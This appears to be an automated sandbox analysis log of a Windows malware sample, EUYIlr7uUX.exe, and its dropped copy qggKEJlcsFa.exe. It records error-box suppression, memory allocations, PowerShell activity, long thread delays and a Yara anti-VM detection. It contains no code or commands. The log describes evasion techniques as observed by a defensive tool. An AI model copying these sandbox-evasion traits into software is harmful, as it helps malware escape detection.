Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qggKEJlcsFa.exe PID: 7864, type: MEMORYSTR

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 1270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 12E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 8DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 9DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 9FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: AFC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Memory allocated: 2870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 10D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 85C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 95C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 97B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: A7B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 10A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 2D30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Memory allocated: 10A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596872	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595819	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594416	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594149	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598776
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597247
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597139
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596570
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596306
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596093
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595765
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595546
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595218
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594453

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6255	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3375	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Window / User API: threadDelayed 2692	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Window / User API: threadDelayed 7140	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Window / User API: foregroundWindowGot 1760	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Window / User API: threadDelayed 1611
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Window / User API: threadDelayed 8257

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 7456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8140	Thread sleep count: 2692 > 30	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8140	Thread sleep count: 7140 > 30	Jump to behavior
